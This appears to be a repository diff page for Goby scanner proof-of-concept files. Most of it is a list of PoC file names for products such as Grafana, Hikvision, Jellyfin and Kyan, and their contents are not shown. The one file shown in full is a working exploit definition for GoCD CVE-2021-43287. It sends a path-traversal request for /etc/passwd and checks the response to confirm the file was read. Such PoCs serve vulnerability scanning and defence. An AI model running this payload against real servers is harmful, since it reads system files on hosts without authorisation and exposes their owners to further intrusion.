1 + { 2 + "Name": "GoCD Arbitrary file reading CVE-2021-43287", 3 + "Level": "3", 4 + "Tags": [ 5 + "fileread" 6 + ], 7 + "GobyQuery": "title=\"Login - Go\"", 8 + "Description": "", 9 + "Product": "", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "[email protected]", 12 + "Impact": "", 13 + "Recommendation": "", 14 + "References": [ 15 + "https://gobies.org/" 16 + ], 17 + "HasExp": true, 18 + "ExpParams": null, 19 + "ExpTips": { 20 + "Type": "", 21 + "Content": "" 22 + }, 23 + "ScanSteps": [ 24 + "AND", 25 + { 26 + "Request": { 27 + "method": "GET", 28 + "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", 29 + "follow_redirect": true, 30 + "header": null, 31 + "data_type": "text", 32 + "data": "", 33 + "set_variable": [] 34 + }, 35 + "ResponseTest": { 36 + "type": "group", 37 + "operation": "AND", 38 + "checks": [ 39 + { 40 + "type": "item", 41 + "variable": "$code", 42 + "operation": "==", 43 + "value": "200", 44 + "bz": "" 45 + }, 46 + { 47 + "type": "item", 48 + "variable": "$body", 49 + "operation": "contains", 50 + "value": "root", 51 + "bz": "" 52 + } 53 + ] 54 + }, 55 + "SetVariable": [ 56 + "output|lastbody|regex|" 57 + ] 58 + } 59 + ], 60 + "ExploitSteps": [ 61 + "AND", 62 + { 63 + "Request": { 64 + "method": "GET", 65 + "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", 66 + "follow_redirect": true, 67 + "header": null, 68 + "data_type": "text", 69 + "data": "", 70 + "set_variable": [] 71 + }, 72 + "ResponseTest": { 73 + "type": "group", 74 + "operation": "AND", 75 + "checks": [ 76 + { 77 + "type": "item", 78 + "variable": "$code", 79 + "operation": "==", 80 + "value": "200", 81 + "bz": "" 82 + }, 83 + { 84 + "type": "item", 85 + "variable": "$body", 86 + "operation": "contains", 87 + "value": "root", 88 + "bz": "" 89 + } 90 + ] 91 + }, 92 + "SetVariable": [ 93 + "output|lastbody|regex|" 94 + ] 95 + } 96 + ], 97 + "PostTime": "2022-07-15 22:05:52", 98 + "GobyVersion": "1.9.323" 99 + } -
lib/goby/goby_pocs/GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Angularjs_Rendering_XSS_CVE_2021_41174.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Plugins_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_v8.x_Arbitrary_File_Read_CVE_2021_43798.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/H5S_CONSOLE_Video_Platform_GetSrc_Information_Leak_CNVD_2021_25919.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_Video_Platform_GetUserInfo_Info_Leak_CNVD_2021_35567.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_video_platform_GetSrc_information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_video_platform_GetUserInfo_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION 视频编码设备接入网关 任意文件下载.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION_Video_coding_equipment_Download_any_file.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_RCE_CVE_2021_36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_Unauthenticated_RCE_CVE-2021-36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_Video_Encoding_Device_Access_Gateway_Any_File_Download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hsmedia_Hgateway_Default_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/IFW8_Enterprise_router_Password_leakage_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/IFW8_Router_ROM_v4.31_Credential_Discovery_CVE_2019_16313.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
-
lib/goby/goby_pocs/JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JQuery_1.7.2_Filedownload.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_10.7.2_SSRF_CVE-2021-29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_SSRF_CVE_2021_29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_28169.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_34429.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JinHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JinHe_OA_C6_download.jsp_Arbitrary_fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JingHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jinshan_V8.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jitong_EWEBS_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jitong_EWEBS_arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Fileread_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Default_Login_CNVD_2021_32425.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Kyan.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_Account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_design_account_password_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_network_monitoring_device_account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_network_monitoring_device_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical